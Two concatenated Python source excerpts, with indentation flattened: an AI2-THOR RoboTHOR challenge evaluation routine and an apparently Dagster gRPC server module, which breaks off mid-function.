def inference(self, episodes, nprocesses=1, test=False):
send_queue = mp.Queue()
receive_queue = mp.Queue()
expected_count = len(episodes)
for e in episodes:
send_queue.put(e)
processes = []
for worker_ind in range(nprocesses):
p = mp.Process(
target=self.inference_worker,
kwargs=dict(
worker_ind=worker_ind,
in_queue=send_queue,
out_queue=receive_queue,
agent_class=self.agent_class,
agent_kwargs=self.agent_kwargs,
controller_kwargs=self.controller_kwargs,
max_steps=self.config["max_steps"],
test=test
),
)
p.start()
processes.append(p)
time.sleep(0.2)
metrics = {"episodes" : {}}
episode_results = []
while len(metrics["episodes"]) < expected_count:
try:
ep_id, episode_metrics, episode_result = receive_queue.get(timeout=10)
metrics["episodes"][ep_id] = episode_metrics
if not test:
episode_results.append(episode_result)
            except queue.Empty:
print("Went 10 seconds without a new episode result.")
if all(not p.is_alive() for p in processes):
try:
ep_id, episode_metrics, episode_result = receive_queue.get(timeout=1)
metrics["episodes"][ep_id] = episode_metrics
if not test:
episode_results.append(episode_result)
                    except queue.Empty:
raise RuntimeError("All processes dead but nothing in queue!")
for p in processes:
p.join(timeout=2)
metrics["ep_len"] = sum([len(em["trajectory"]) for em in metrics["episodes"].values()]) / len(metrics["episodes"])
if not test:
metrics["success"] = sum([r["success"] for r in episode_results]) / len(episode_results)
metrics["spl"] = ai2thor.util.metrics.compute_spl(episode_results)
if not test:
logger.info("Total Episodes: {episode_count} Success:{success} SPL:{spl} Episode Length:{ep_len}".format(episode_count=len(episodes), success=metrics["success"], spl=metrics["spl"], ep_len=metrics["ep_len"]))
else:
logger.info("Total Episodes: {episode_count} Episode Length:{ep_len}".format(episode_count=len(episodes), ep_len=metrics["ep_len"]))
return metrics
def _change_scene(self, scene):
if self.current_scene != scene:
self.current_scene = scene
self.controller.reset(scene)
logger.info("Changed to scene: '{scene}'".format(scene=scene))
def move_to_point(self, datapoint):
self._change_scene(datapoint["scene"])
logger.info("Moving to position: {p}, y-rotation: {rot}, horizon: {hor}".format(
p=datapoint["initial_position"],
rot=datapoint["initial_orientation"],
hor=datapoint["initial_horizon"]
))
return self.controller.step(
action="TeleportFull",
x=datapoint["initial_position"]["x"],
y=datapoint["initial_position"]["y"],
z=datapoint["initial_position"]["z"],
rotation={"x" : 0, "y" : datapoint["initial_orientation"], "z" : 0},
horizon=datapoint["initial_horizon"],
standing=True
)
def move_to_random_dataset_point(self, dataset, scene, object_type):
if scene in dataset:
if object_type in dataset[scene]:
datapoint = random.choice(dataset[scene][object_type])
return self.move_to_point(datapoint)
else:
logger.warning(
"No object of type: '{object_type}' for scene: '{scene}', in dataset".format(
object_type=object_type,
scene=scene
)
)
return None
else:
logger.warning("No scene: '{scene}' in dataset".format(scene=scene))
return None
def move_to_random_point(self, scene, y_rotation=0, horizon=0):
if "test" in scene:
raise RuntimeError(
"Moving to random points is not posible in test scenes"
)
reachable_positions = self._get_reachable_positions_in_scene(scene)
p = random.choice(reachable_positions)
return self.move_to_point({
"initial_position": p,
"initial_orientation": y_rotation,
"initial_horizon": horizon,
"scene" : scene
})
def _get_reachable_positions_in_scene(self, scene):
self._change_scene(scene)
if scene not in self.reachable_positions_per_scene:
event_reachable = self.controller.step({
"action" : "GetReachablePositions",
"gridSize" : self.config["initialize"]["gridSize"]
})
self.reachable_positions_per_scene[scene] = event_reachable.metadata["actionReturn"]
return self.reachable_positions_per_scene[scene]
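# Hedged usage sketch (config path, dataset directory, split name and agent class are
# illustrative assumptions, not defined in this file):
#   challenge = RobothorChallenge("challenge_config.yaml", MyAgent, {"device": "cpu"})
#   episodes, dataset = challenge.load_split("dataset", "val")
#   metrics = challenge.inference(episodes, nprocesses=2, test=False)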
|
server.py
|
import math
import os
import queue
import sys
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
from time import sleep
import grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import (
ReconstructableRepository,
repository_def_from_target_def,
)
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.host_representation.origin import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.instance import DagsterInstance
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import IPCErrorMessage, ipc_write_stream, open_ipc_subprocess
from dagster.seven import multiprocessing
from dagster.utils import find_free_port, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_notebook_data,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class RepositorySymbolsAndCodePointers:
def __init__(self, loadable_target_origin):
self._loadable_target_origin = loadable_target_origin
self._loadable_repository_symbols = None
self._code_pointers_by_repo_name = None
def load(self):
self._loadable_repository_symbols = load_loadable_repository_symbols(
self._loadable_target_origin
)
self._code_pointers_by_repo_name = build_code_pointers_by_repo_name(
self._loadable_target_origin, self._loadable_repository_symbols
)
@property
def loadable_repository_symbols(self):
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
return self._code_pointers_by_repo_name
def load_loadable_repository_symbols(loadable_target_origin):
if loadable_target_origin:
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
return [
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repository_def_from_target_def(
loadable_target.target_definition
).name,
)
for loadable_target in loadable_targets
]
else:
return []
def build_code_pointers_by_repo_name(loadable_target_origin, loadable_repository_symbols):
repository_code_pointer_dict = {}
for loadable_repository_symbol in loadable_repository_symbols:
if loadable_target_origin.python_file:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_package(
loadable_target_origin.package_name,
loadable_repository_symbol.attribute,
)
else:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_module(
loadable_target_origin.module_name,
loadable_repository_symbol.attribute,
)
return repository_code_pointer_dict
class DagsterApiServer(DagsterApiServicer):
    # The loadable_target_origin is currently Noneable to support instantiating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
        # The client tells the server to shut down by calling ShutdownServer (or by failing to
        # send a heartbeat), at which point this event is set. The cleanup thread then sets the
        # server termination event once all current executions have finished, which stops the server.
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._serializable_load_error = None
self._repository_symbols_and_code_pointers = RepositorySymbolsAndCodePointers(
loadable_target_origin
)
try:
self._repository_symbols_and_code_pointers.load()
except Exception: # pylint:disable=broad-except
if not lazy_load_user_code:
raise
self._serializable_load_error = serializable_error_info_from_exc_info(sys.exc_info())
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = (
f"Pipeline execution process for {run.run_id} unexpectedly "
f"exited with exit code {process.exitcode}."
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(self, external_repository_origin):
check.inst_param(
external_repository_origin,
"external_repository_origin",
ExternalRepositoryOrigin,
)
return ReconstructableRepository(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name[
external_repository_origin.repository_name
],
self._get_current_image(),
)
def _recon_pipeline_from_origin(self, external_pipeline_origin):
check.inst_param(
external_pipeline_origin, "external_pipeline_origin", ExternalPipelineOrigin
)
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
if self._serializable_load_error:
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(
self._serializable_load_error
)
)
response = ListRepositoriesResponse(
self._repository_symbols_and_code_pointers.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name
),
)
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(
recon_repo,
partition_names_args.partition_set_name,
)
)
)
def ExternalNotebookData(self, request, _context):
notebook_path = request.notebook_path
check.str_param(notebook_path, "notebook_path")
return api_pb2.ExternalNotebookDataReply(content=get_notebook_data(notebook_path))
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args,
"args",
PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_data = serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_data)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(float(len(serialized_external_repository_data)) / STREAMING_CHUNK_SIZE)
)
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def _split_serialized_data_into_chunk_events(self, serialized_data):
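        # Illustrative chunking arithmetic: with STREAMING_CHUNK_SIZE = 4,000,000, a
        # 9,500,000-character payload yields ceil(9.5e6 / 4e6) = 3 chunk events of
        # 4,000,000, 4,000,000 and 1,500,000 characters.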
num_chunks = int(math.ceil(float(len(serialized_data)) / STREAMING_CHUNK_SIZE))
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_data),
)
yield api_pb2.StreamingChunkEvent(
sequence_number=i,
serialized_chunk=serialized_data[start_index:end_index],
)
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args,
"args",
ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_schedule_data = serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_schedule_data)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_sensor_data = serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
args.cursor,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_sensor_data)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except: # pylint: disable=bare-except
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except: # pylint: disable=bare-except
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except: # pylint: disable=bare-except
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = multiprocessing.Queue()
termination_event = multiprocessing.Event()
execution_process = multiprocessing.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id,
exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def _get_current_image(self):
return os.getenv("DAGSTER_CURRENT_IMAGE")
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=self._get_current_image(), serializable_error_info=None
)
)
)
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerFailedToBindEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(namedtuple("GrpcServerLoadErrorEvent", "error_info")):
def __new__(cls, error_info):
return super(GrpcServerLoadErrorEvent, cls).__new__(
cls,
check.inst_param(error_info, "error_info", SerializableErrorInfo),
)
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=None,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.opt_int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True,
"Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
self.server = grpc.server(
ThreadPoolExecutor(max_workers=max_workers),
compression=grpc.Compression.Gzip,
)
self._server_termination_event = threading.Event()
try:
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except Exception:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(
GrpcServerLoadErrorEvent(
error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
raise
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, client, subprocess_args, timeout=60):
start_time = time.time()
last_error = None
while True:
try:
client.ping("")
return
except grpc._channel._InactiveRpcError: # pylint: disable=protected-access
last_error = serializable_error_info_from_exc_info(sys.exc_info())
if time.time() - start_time > timeout:
raise Exception(
f"Timed out waiting for gRPC server to start with arguments: \"{' '.join(subprocess_args)}\". Most recent connection error: {str(last_error)}"
)
        if server_process.poll() is not None:
raise Exception(
f"gRPC server exited with return code {server_process.returncode} while starting up with the command: \"{' '.join(subprocess_args)}\""
)
sleep(0.1)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
mocked_system_timezone = get_mocked_system_timezone()
subprocess_args = (
[
loadable_target_origin.executable_path
if loadable_target_origin and loadable_target_origin.executable_path
else sys.executable,
"-m",
"dagster.grpc",
]
+ ["--lazy-load-user-code"]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ (["-n", str(max_workers)] if max_workers else [])
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (["--override-system-timezone", mocked_system_timezone] if mocked_system_timezone else [])
)
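    # For illustration (all values hypothetical): with port=4266, max_workers=4 and heartbeat
    # enabled, the argument list above renders to roughly:
    #   <python> -m dagster.grpc --lazy-load-user-code --port 4266 -n 4 --heartbeat --heartbeat-timeout 30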
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
from dagster.grpc.client import DagsterGrpcClient
client = DagsterGrpcClient(
port=port,
socket=socket,
host="localhost",
)
try:
wait_for_grpc_server(server_process, client, subprocess_args, timeout=startup_timeout)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
